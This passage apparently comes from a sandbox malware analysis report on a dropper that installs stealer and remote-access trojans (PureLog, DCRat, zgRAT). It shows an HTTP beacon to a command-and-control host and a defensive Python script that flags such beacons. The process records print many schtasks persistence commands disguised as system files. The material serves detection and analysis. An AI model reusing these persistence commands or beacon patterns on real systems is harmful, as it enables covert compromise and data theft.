                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:52.624927998 CET | 344 | OUT | Data Raw: 00 02 01 01 06 0a 01 01 05 06 02 01 02 03 01 05 00 01 05 0b 02 04 03 00 01 0f 0e 0c 07 01 00 06 0f 02 06 09 02 00 04 04 0f 06 07 0a 00 07 06 00 03 00 0d 09 0f 00 01 06 04 04 06 07 01 05 06 08 00 07 0c 0b 04 56 06 08 0f 07 0e 00 0e 0c 0c 55 05 0c
                                                  Data Ascii: VUZWU\L}R|c~@cqb]wupBkRaM`Bh~`tKxR{{^_Xh}^@cwliO~V@{S~L}rW
                                                  Jan 2, 2025 07:43:52.908746004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:53.042171001 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
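
Both sessions above show the same beacon shape: a POST to /Videouploads.php that declares application/x-www-form-urlencoded but carries a 344-byte body made almost entirely of bytes below 0x10, sent with a Chrome User-Agent yet with an Expect: 100-continue header (a .NET HttpWebRequest default that real browsers do not send), and answered by an nginx 404. The script below is an added example, not Joe Sandbox or DCRat code: it parses the session 12 request exactly as printed above (headers verbatim; the body is the 82-byte prefix the report shows of the 344-byte payload) and flags each of those mismatches. The benign login request used for contrast is constructed, and the 0.8 low-byte threshold is an assumption.

```python
"""
Triage of the C2 HTTP POST beacons recorded in the network sessions above.
Added example; not Joe Sandbox or DCRat code.
"""
from typing import Dict, List, Tuple

# Request headers exactly as shown for session 12 above. The body is the 82-byte
# prefix printed in the report's "Data Raw" field; the full body was 344 bytes.
SESSION_12_HEADERS = (
    "POST /Videouploads.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29\r\n"
    "Host: 797441cm.n9shteam2.top\r\n"
    "Content-Length: 344\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
SESSION_12_BODY = bytes.fromhex(
    "05 05 04 0d 06 0a 01 00 05 06 02 01 02 04 01 01 00 06 05 0f 02 0d 03 09"
    " 01 01 0a 06 05 02 01 50 0f 56 04 01 03 04 07 00 0e 57 02 0b 07 01 04 02"
    " 05 03 0f 01 0a 05 04 52 01 07 03 05 06 01 04 01 01 0b 0e 0b 07 54 04 08"
    " 0e 00 0b 0f 0c 0d 0c 06 02 00"
)
SESSION_12_RAW = SESSION_12_HEADERS.encode("ascii") + SESSION_12_BODY

# Constructed benign form post for contrast (not from the report).
BENIGN_RAW = (
    b"POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 17\r\n"
    b"\r\nuser=a&password=b"
)

# Share of body bytes below 0x10 above which the body is treated as encoded
# rather than text (assumption; both captured beacons are above 0.9).
LOW_BYTE_THRESHOLD = 0.8


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def low_byte_fraction(body: bytes) -> float:
    """Fraction of body bytes with value < 0x10 (0.0 for an empty body)."""
    if not body:
        return 0.0
    return sum(1 for b in body if b < 0x10) / len(body)


def looks_form_urlencoded(body: bytes) -> bool:
    """A genuine form body is printable ASCII containing at least one key=value."""
    return all(0x20 <= b < 0x7F for b in body) and b"=" in body


def triage_request(raw: bytes) -> List[str]:
    """Return the list of beacon indicators found in one request (empty if none)."""
    method, _path, headers, body = parse_request(raw)
    findings: List[str] = []
    ctype = headers.get("content-type", "").lower()
    if method == "POST" and "x-www-form-urlencoded" in ctype and not looks_form_urlencoded(body):
        findings.append("declared form-urlencoded but body is binary")
    frac = low_byte_fraction(body)
    if frac > LOW_BYTE_THRESHOLD:
        findings.append(f"{frac:.0%} of body bytes are below 0x10 (encoded payload, not text)")
    if headers.get("expect", "").lower() == "100-continue" and "mozilla" in headers.get("user-agent", "").lower():
        findings.append("browser User-Agent with Expect: 100-continue (.NET HttpWebRequest default, browsers do not send it)")
    declared = int(headers.get("content-length", "0") or 0)
    if declared and len(body) < declared:
        findings.append(f"body truncated: {len(body)} of {declared} declared bytes available")
    return findings


if __name__ == "__main__":
    for label, raw in (("session 12", SESSION_12_RAW), ("benign", BENIGN_RAW)):
        print(label, triage_request(raw) or ["no indicators"])
```

The form-body check is the one worth keeping in a production rule: a Content-Type that promises key=value text while the bytes are control characters is independent of the host name and path, which this family rotates.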



                                                  Target ID:0
                                                  Start time:01:41:56
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\t8F7Ic986c.exe"
                                                  Imagebase:0x7ff652ed0000
                                                  File size:7'204'705 bytes
                                                  MD5 hash:A4923D4DB3234B3905AD3097CC03AF46
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\t8F7Ic986c.exe"
                                                  Imagebase:0x7ff652ed0000
                                                  File size:7'204'705 bytes
                                                  MD5 hash:A4923D4DB3234B3905AD3097CC03AF46
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                                                  Imagebase:0x7ff6c0350000
                                                  File size:2'117'940 bytes
                                                  MD5 hash:B0A28FF93B030B10FD70698A5A7C27D0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 57%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:01:41:58
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:01:41:58
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:01:41:58
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.sfx.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:Chaindriver.sfx.exe -p1234
                                                  Imagebase:0x7ff720b30000
                                                  File size:1'903'066 bytes
                                                  MD5 hash:9E935AF26F27628601A2A336CA24AEF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 18%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:01:41:59
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Chaindriver.exe"
                                                  Imagebase:0x660000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 70%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 12 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
                                                  Imagebase:0x7ff70e260000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"
                                                  Imagebase:0x7ff660410000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 5 /tr "'C:\Recovery\Memory Compression.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "Chaindriver" /sc ONLOGON /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff774450000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:01:42:03
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff6502f0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Chaindriver.exe
                                                  Imagebase:0x850000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Chaindriver.exe
                                                  Imagebase:0xa0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Recovery\Memory Compression.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\Memory Compression.exe"
                                                  Imagebase:0x550000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 70%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:01:42:04
                                                  Start date:02/01/2025
                                                  Path:C:\Recovery\Memory Compression.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\Memory Compression.exe"
                                                  Imagebase:0x6b0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:01:42:05
                                                  Start date:02/01/2025
                                                  Path:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Imagebase:0x7c0000
                                                  File size:1'917'952 bytes
